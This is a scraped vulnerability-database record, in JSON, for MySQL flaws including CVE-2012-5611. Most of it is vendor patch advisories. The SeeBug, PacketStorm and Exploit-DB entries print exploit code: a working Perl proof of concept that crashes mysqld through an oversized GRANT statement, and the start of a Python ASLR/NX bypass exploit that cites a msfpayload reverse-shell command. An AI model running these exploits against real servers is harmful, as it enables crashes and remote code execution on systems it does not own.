"href": "https://usn.ubuntu.com/1621-1/", "title": "MySQL vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:23:37", "bulletinFamily": "unix", "description": "It was discovered that MySQL incorrectly handled certain long arguments. A remote authenticated attacker could use this issue to possibly execute arbitrary code.", "modified": "2012-12-10T00:00:00", "published": "2012-12-10T00:00:00", "id": "USN-1658-1", "href": "https://usn.ubuntu.com/1658-1/", "title": "MySQL vulnerability", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:1462\n\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nThis update fixes several vulnerabilities in the MySQL database server.\nInformation about these flaws can be found on the Oracle Critical Patch\nUpdate Advisory pages, listed in the References section. (CVE-2012-1688,\nCVE-2012-1690, CVE-2012-1703, CVE-2012-2749, CVE-2012-0540, CVE-2012-1689,\nCVE-2012-1734, CVE-2012-3163, CVE-2012-3158, CVE-2012-3177, CVE-2012-3166,\nCVE-2012-3173, CVE-2012-3150, CVE-2012-3180, CVE-2012-3167, CVE-2012-3197,\nCVE-2012-3160)\n\nThese updated packages upgrade MySQL to version 5.1.66. Refer to the MySQL\nrelease notes listed in the References section for a full list of changes.\n\nAll MySQL users should upgrade to these updated packages, which correct\nthese issues. After installing this update, the MySQL server daemon\n(mysqld) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-November/018995.html\n\n**Affected packages:**\nmysql\nmysql-bench\nmysql-devel\nmysql-embedded\nmysql-embedded-devel\nmysql-libs\nmysql-server\nmysql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1462.html", "modified": "2012-11-15T03:44:02", "published": "2012-11-15T03:44:02", "href": "http://lists.centos.org/pipermail/centos-announce/2012-November/018995.html", "id": "CESA-2012:1462", "title": "mysql security update", "type": "centos", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:1551\n\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nA stack-based buffer overflow flaw was found in the user permission\nchecking code in MySQL. An authenticated database user could use this flaw\nto crash the mysqld daemon or, potentially, execute arbitrary code with the\nprivileges of the user running the mysqld daemon. (CVE-2012-5611)\n\nAll MySQL users should upgrade to these updated packages, which correct\nthis issue. After installing this update, the MySQL server daemon (mysqld)\nwill be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-December/019026.html\n\n**Affected packages:**\nmysql\nmysql-bench\nmysql-devel\nmysql-embedded\nmysql-embedded-devel\nmysql-libs\nmysql-server\nmysql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1551.html", "modified": "2012-12-07T17:47:08", "published": "2012-12-07T17:47:08", "href": "http://lists.centos.org/pipermail/centos-announce/2012-December/019026.html", "id": "CESA-2012:1551", "title": "mysql security update", "type": "centos", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T17:52:33", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2012-12-28T00:00:00", "published": "2012-12-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60545", "id": "SSV:60545", "type": "seebug", "title": "MySQL Stack Buffer Overflow Linux x86 32bits (bypass SSP/RELRO/NX/ASLR)", "sourceData": "\n #!/usr/bin/env python\r\n# 27/12/12 - status : public release\r\n\r\n# CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )\r\n# -------- Author : ipv\r\n# -------- Impact : high\r\n# -------- URL\t\t: http://blog.ring0.me/\r\n# -------- Description\r\n#\r\n# The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.\r\n# MySQL server is prone to a remote buffer overflow that \r\n# allow remote authenticated attacker to reach code execution in the \r\n# context of the user running MySQL instance (default: mysql user).\r\n\r\n# The vulnerability resides in acl_get function, called when authenticated\r\n# user requests a privileged Account Managment statement. MySQL fails \r\n# to verify user controlled data len of "db" parameter.\r\n#\r\n# \tend=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);\r\n#\r\n# The destination address of strcpy is located on a mmaped page dedicated to \r\n# user connection which allow a buffer overflow on adjacent memory.\r\n#\r\n# Differents attacks vector may be possiblea according the system.\r\n# FYI Microsoft Windows versions are as well vulnerables.\r\n#---------------------------------------------------------\r\n# To bypass ASLR/SSP/RELRO/NX:\r\n#------------------------------------------------------------------------------\r\n# I take profit of Threading-Model. This means MySQL use only one address \r\n# space for all MySQL ressources (data structures, network managment, \r\n# session, etc.). \r\n# To bypass SSP, i overwrite sysinfo handler(pointing to sysenter vdso) of \r\n# TCB structure located more higher on the stack. \r\n# ROP chains aims to pivot to our controlled stack data. At this point, \r\n# if we overwrite sysinfo handler, we cannot use ret2libc and/or GOT \r\n# deferencing technique since libc API relies on the sysinfo pointer \r\n# to call sysenter.\r\n#\r\n# So to accomplish code exec, afaik, you have two way : \r\n#\t1 - Extract sysinfo of an intact TCB and use it as proxy call\r\n#\t(or you can restore the first sysinfo after doing modification on got)\r\n#\t\t-> i use it for redhat exploit (no SSP on redhat/centos); \r\n#\t\t-> this allow us to bypass relro/alsr/nx\r\n#\t\trelro.\r\n#\t2 - Find a int0x80 / sysenter gadget in .text ;\r\n#\t(Bad instruction follow int0x80 gadget, you have a one shooter to get\r\n#\tcode exec). So, i advise you to find a sysenter)\r\n#\t\t- i use sysenter for ubuntu 10.04 self-compiled with SSP. \r\n#\t\t- this allow us bypass relro/ssp/alsr/nx\r\n# \r\n# Shellcodes are alphanum-mixed (skylined tool ftw). Exploit bypass\r\n# SSP/ASLR/NX.\r\n#\r\n#---------------------------------------------------------\r\n# UTF-8 and ROP chains limitation :\r\n#---------------------------------------------------------\r\n# Mysql Schema Object Name restricts database name to be alpha numeric \r\n# (and $ _).\r\n# To bypass it, i use utf-8 encoding with byte lower than 0x80. Encoding is \r\n# done via MySQL when databasename is quoted with `` (mandatory to \r\n# successful exploit target). Yes the devil is in the details.\r\n\r\n# MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html\r\n#\r\n# For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net\r\n\r\n########################################################################\r\n# Modules\r\n#\r\n\r\nimport pymysql\r\nimport sys\r\nimport struct\r\nimport os, socket\r\n\r\n########################################################################\r\n# Authentication options \r\n#\r\n\r\nMYSQL_USER = "test"\r\nMYSQL_PASSWORD = ""\r\n\r\n#MYSQL_HOST = "192.168.130.147"\r\nMYSQL_HOST = "192.168.130.129"\r\nMYSQL_PORT = 3306\r\n\r\n########################################################################\r\n# Helper\r\n# \r\n\r\ndef _x(v):\r\n\tif isinstance(v, str):\r\n\t\treturn v\r\n\treturn struct.pack("<I", v)\r\n\r\n# TCP is used when we face to SSP\r\nclass _TCB:\r\n\ttcb = 0 # updated later by a ret gadget\r\n\tdtv = "BBBB"\r\n\t_self = "CCCC"\r\n\tmultiple_threads= "DDDD"\r\n\tsysinfo = 0 # SEIP - updated later by stack pivot gadget \r\n\tstack_guard = "AAAA"\r\n\tpointer_guard = 0 # updated later by a pop pop ret gadget\r\n\r\n# base class\r\nclass rc_base:\r\n\teip_off = 0\r\n\talign_payload = 0\r\n\talign_stack = 2048\r\n\tretsled = ""\r\n\tsafe_overwrite = ""\r\n\tpivot = ""\r\n\tpppr = ""\r\n\tppr = ""\r\n\t\r\n\t# ./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp\r\n\t# XXX - CHANGEME !\r\n\tsc_rev_tcp =\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60545", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2019-05-29T17:22:27", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA stack-based buffer overflow flaw was found in the user permission checking code in MySQL. An authenticated database user could use this flaw to crash the mysqld daemon or, potentially, execute arbitrary code with the privileges of the user running the mysqld daemon. ([CVE-2012-5611 __](<https://access.redhat.com/security/cve/CVE-2012-5611>))\n\n \n**Affected Packages:** \n\n\nmysql55\n\n \n**Issue Correction:** \nRun _yum update mysql55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n mysql55-embedded-devel-5.5.28-2.26.amzn1.i686 \n mysql55-server-5.5.28-2.26.amzn1.i686 \n mysql55-bench-5.5.28-2.26.amzn1.i686 \n mysql55-libs-5.5.28-2.26.amzn1.i686 \n mysql55-test-5.5.28-2.26.amzn1.i686 \n mysql55-common-5.5.28-2.26.amzn1.i686 \n mysql55-embedded-5.5.28-2.26.amzn1.i686 \n mysql55-debuginfo-5.5.28-2.26.amzn1.i686 \n mysql55-devel-5.5.28-2.26.amzn1.i686 \n mysql55-5.5.28-2.26.amzn1.i686 \n \n src: \n mysql55-5.5.28-2.26.amzn1.src \n \n x86_64: \n mysql55-common-5.5.28-2.26.amzn1.x86_64 \n mysql55-embedded-devel-5.5.28-2.26.amzn1.x86_64 \n mysql55-devel-5.5.28-2.26.amzn1.x86_64 \n mysql55-libs-5.5.28-2.26.amzn1.x86_64 \n mysql55-debuginfo-5.5.28-2.26.amzn1.x86_64 \n mysql55-5.5.28-2.26.amzn1.x86_64 \n mysql55-server-5.5.28-2.26.amzn1.x86_64 \n mysql55-test-5.5.28-2.26.amzn1.x86_64 \n mysql55-bench-5.5.28-2.26.amzn1.x86_64 \n mysql55-embedded-5.5.28-2.26.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T17:19:00", "published": "2014-09-14T17:19:00", "id": "ALAS-2012-144", "href": "https://alas.aws.amazon.com/ALAS-2012-144.html", "title": "Important: mysql55", "type": "amazon", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:22:26", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA stack-based buffer overflow flaw was found in the user permission checking code in MySQL. An authenticated database user could use this flaw to crash the mysqld daemon or, potentially, execute arbitrary code with the privileges of the user running the mysqld daemon. ([CVE-2012-5611 __](<https://access.redhat.com/security/cve/CVE-2012-5611>))\n\n \n**Affected Packages:** \n\n\nmysql51\n\n \n**Issue Correction:** \nRun _yum update mysql51_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n mysql51-bench-5.1.66-1.57.amzn1.i686 \n mysql51-5.1.66-1.57.amzn1.i686 \n mysql51-embedded-5.1.66-1.57.amzn1.i686 \n mysql51-embedded-devel-5.1.66-1.57.amzn1.i686 \n mysql51-libs-5.1.66-1.57.amzn1.i686 \n mysql51-debuginfo-5.1.66-1.57.amzn1.i686 \n mysql51-common-5.1.66-1.57.amzn1.i686 \n mysql51-test-5.1.66-1.57.amzn1.i686 \n mysql51-devel-5.1.66-1.57.amzn1.i686 \n mysql51-server-5.1.66-1.57.amzn1.i686 \n \n src: \n mysql51-5.1.66-1.57.amzn1.src \n \n x86_64: \n mysql51-5.1.66-1.57.amzn1.x86_64 \n mysql51-debuginfo-5.1.66-1.57.amzn1.x86_64 \n mysql51-embedded-5.1.66-1.57.amzn1.x86_64 \n mysql51-server-5.1.66-1.57.amzn1.x86_64 \n mysql51-libs-5.1.66-1.57.amzn1.x86_64 \n mysql51-embedded-devel-5.1.66-1.57.amzn1.x86_64 \n mysql51-devel-5.1.66-1.57.amzn1.x86_64 \n mysql51-common-5.1.66-1.57.amzn1.x86_64 \n mysql51-test-5.1.66-1.57.amzn1.x86_64 \n mysql51-bench-5.1.66-1.57.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T17:19:00", "published": "2014-09-14T17:19:00", "id": "ALAS-2012-145", "href": "https://alas.aws.amazon.com/ALAS-2012-145.html", "title": "Important: mysql51", "type": "amazon", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:10", "bulletinFamily": "exploit", "description": "", "modified": "2012-12-03T00:00:00", "published": "2012-12-03T00:00:00", "href": "https://packetstormsecurity.com/files/118550/Oracle-MySQL-Server-5.5.19-log-Stack-Based-Overrun.html", "id": "PACKETSTORM:118550", "type": "packetstorm", "title": "Oracle MySQL Server 5.5.19-log Stack-Based Overrun", "sourceData": "`#!/usr/bin/perl \n=for comment \n \nMySQL Server exploitable stack based overrun \nVer 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too) \nunprivileged user (any account (anonymous account?), post auth) \nas illustrated below the instruction pointer is overwritten with 0x41414141 \nbug found by Kingcope \nthis will yield a shell as the user 'mysql' when properly exploited \n \nmysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core \nGNU gdb (GDB) SUSE (7.2-3.3) \nCopyright (C) 2010 Free Software Foundation, Inc. \nLicense GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> \nThis is free software: you are free to change and redistribute it. \nThere is NO WARRANTY, to the extent permitted by law. Type \"show copying\" \nand \"show warranty\" for details. \nThis GDB was configured as \"i586-suse-linux\". \nFor bug reporting instructions, please see: \n<http://www.gnu.org/software/gdb/bugs/>. \nMissing separate debuginfo for the main executable file \nTry: zypper install -C \"debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803\" \n[New Thread 8801] \n[New Thread 8789] \n[New Thread 8793] \n[New Thread 8791] \n[New Thread 8787] \n[New Thread 8790] \n[New Thread 8799] \n[New Thread 8794] \n[New Thread 8792] \n[New Thread 8788] \n[New Thread 8800] \n[New Thread 8786] \n[New Thread 8797] \n[New Thread 8798] \n[New Thread 8785] \n[New Thread 8796] \n[New Thread 8783] \nCore was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log'. \nProgram terminated with signal 11, Segmentation fault. \n#0 0x41414141 in ?? () \n(gdb) \n=cut \n \nuse strict; \nuse DBI(); \n \n# Connect to the database. \nmy $dbh = DBI->connect(\"DBI:mysql:database=test;host=192.168.2.3;\", \n\"user\", \"secret\", \n{'RaiseError' => 1}); \n \n$a =\"A\" x 100000; \nmy $sth = $dbh->prepare(\"grant file on $a.* to 'user'\\@'%' identified by 'secret';\"); \n$sth->execute(); \n \n# Disconnect from the database. \n$dbh->disconnect(); \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/118550/mysql_bufferoverrun.pl.txt", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:28:47", "bulletinFamily": "unix", "description": "mysql community server was updated to 5.5.28, fixing bugs\n and security issues. See\n <a rel=\"nofollow\" href=\"http://dev.mysql.com/doc/refman/5.5/en/news-5-5-27.html\">http://dev.mysql.com/doc/refman/5.5/en/news-5-5-27.html</a>\n <a rel=\"nofollow\" href=\"http://dev.mysql.com/doc/refman/5.5/en/news-5-5-28.html\">http://dev.mysql.com/doc/refman/5.5/en/news-5-5-28.html</a>\n\n", "modified": "2013-01-07T17:09:06", "published": "2013-01-07T17:09:06", "id": "OPENSUSE-SU-2013:0013-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00001.html", "type": "suse", "title": "mysql-community-server: updated to 5.5.28 (important)", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:24:48", "bulletinFamily": "unix", "description": "MariaDB was updated to 5.5.28a, fixing bugs and security\n issues:\n\n * Release notes:\n <a rel=\"nofollow\" href=\"http://kb.askmonty.org/v/mariadb-5528a-release-notes\">http://kb.askmonty.org/v/mariadb-5528a-release-notes</a>\n <a rel=\"nofollow\" href=\"http://kb.askmonty.org/v/mariadb-5528-release-notes\">http://kb.askmonty.org/v/mariadb-5528-release-notes</a>\n <a rel=\"nofollow\" href=\"http://kb.askmonty.org/v/mariadb-5527-release-notes\">http://kb.askmonty.org/v/mariadb-5527-release-notes</a>\n * Changelog:\n <a rel=\"nofollow\" href=\"http://kb.askmonty.org/v/mariadb-5528a-changelog\">http://kb.askmonty.org/v/mariadb-5528a-changelog</a>\n <a rel=\"nofollow\" href=\"http://kb.askmonty.org/v/mariadb-5528-changelog\">http://kb.askmonty.org/v/mariadb-5528-changelog</a>\n <a rel=\"nofollow\" href=\"http://kb.askmonty.org/v/mariadb-5527-changelog\">http://kb.askmonty.org/v/mariadb-5527-changelog</a>\n\n", "modified": "2013-01-07T17:08:35", "published": "2013-01-07T17:08:35", "id": "OPENSUSE-SU-2013:0011-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00000.html", "title": "mariadb to 5.5.28a (important)", "type": "suse", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:23:22", "bulletinFamily": "unix", "description": "MariaDB was updated to 5.1.66:\n\n <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-5166-release-notes/\">https://kb.askmonty.org/en/mariadb-5166-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-5166-changelog/\">https://kb.askmonty.org/en/mariadb-5166-changelog/</a>\n\n", "modified": "2013-01-23T14:06:17", "published": "2013-01-23T14:06:17", "id": "OPENSUSE-SU-2013:0156-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00020.html", "title": "mariadb to 5.1.66 (important)", "type": "suse", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:57:02", "bulletinFamily": "unix", "description": "mysql community server was updated to 5.1.67, fixing bugs\n and security issues. See\n <a rel=\"nofollow\" href=\"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-67.html\">http://dev.mysql.com/doc/refman/5.1/en/news-5-1-67.html</a>\n <a rel=\"nofollow\" href=\"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html\">http://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html</a>\n\n", "modified": "2013-01-23T14:05:08", "published": "2013-01-23T14:05:08", "id": "OPENSUSE-SU-2013:0135-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00013.html", "title": "mysql-community-server: updated to 5.1.67 (important)", "type": "suse", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:50:54", "bulletinFamily": "unix", "description": "MariaDB was updated to 5.2.13.\n\n * Release notes:\n <a rel=\"nofollow\" href=\"http://kb.askmonty.org/v/mariadb-5213-release-notes\">http://kb.askmonty.org/v/mariadb-5213-release-notes</a>\n * Changelog: <a rel=\"nofollow\" href=\"http://kb.askmonty.org/v/mariadb-5213-changelog\">http://kb.askmonty.org/v/mariadb-5213-changelog</a>\n\n", "modified": "2013-01-07T17:09:18", "published": "2013-01-07T17:09:18", "id": "OPENSUSE-SU-2013:0014-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00002.html", "type": "suse", "title": "mariadb to 5.2.13 (important)", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T20:12:40", "bulletinFamily": "exploit", "description": "MySQL (Linux) - Stack Based Buffer Overrun PoC (0day). CVE-2012-5611. Dos exploit for linux platform", "modified": "2012-12-02T00:00:00", "published": "2012-12-02T00:00:00", "id": "EDB-ID:23075", "href": "https://www.exploit-db.com/exploits/23075/", "type": "exploitdb", "title": "MySQL Linux - Stack Based Buffer Overrun PoC 0day", "sourceData": "#!/usr/bin/perl\r\n=for comment\r\n\r\n MySQL Server exploitable stack based overrun\r\n Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too)\r\n unprivileged user (any account (anonymous account?), post auth)\r\n as illustrated below the instruction pointer is overwritten with 0x41414141\r\n bug found by Kingcope\r\n this will yield a shell as the user 'mysql' when properly exploited\r\n \r\nmysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core\r\nGNU gdb (GDB) SUSE (7.2-3.3)\r\nCopyright (C) 2010 Free Software Foundation, Inc.\r\nLicense GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\r\nThis is free software: you are free to change and redistribute it.\r\nThere is NO WARRANTY, to the extent permitted by law. Type \"show copying\"\r\nand \"show warranty\" for details.\r\nThis GDB was configured as \"i586-suse-linux\".\r\nFor bug reporting instructions, please see:\r\n<http://www.gnu.org/software/gdb/bugs/>.\r\nMissing separate debuginfo for the main executable file\r\nTry: zypper install -C \"debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803\"\r\n[New Thread 8801]\r\n[New Thread 8789]\r\n[New Thread 8793]\r\n[New Thread 8791]\r\n[New Thread 8787]\r\n[New Thread 8790]\r\n[New Thread 8799]\r\n[New Thread 8794]\r\n[New Thread 8792]\r\n[New Thread 8788]\r\n[New Thread 8800]\r\n[New Thread 8786]\r\n[New Thread 8797]\r\n[New Thread 8798]\r\n[New Thread 8785]\r\n[New Thread 8796]\r\n[New Thread 8783]\r\nCore was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log'.\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x41414141 in ?? ()\r\n(gdb)\r\n=cut\r\n\r\n use strict;\r\n use DBI();\r\n\r\n # Connect to the database.\r\n my $dbh = DBI->connect(\"DBI:mysql:database=test;host=192.168.2.3;\",\r\n \"user\", \"secret\",\r\n {'RaiseError' => 1});\r\n\r\n $a =\"A\" x 100000;\r\n my $sth = $dbh->prepare(\"grant file on $a.* to 'user'\\@'%' identified by 'secret';\");\r\n $sth->execute();\r\n \r\n # Disconnect from the database.\r\n $dbh->disconnect();", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23075/"}]}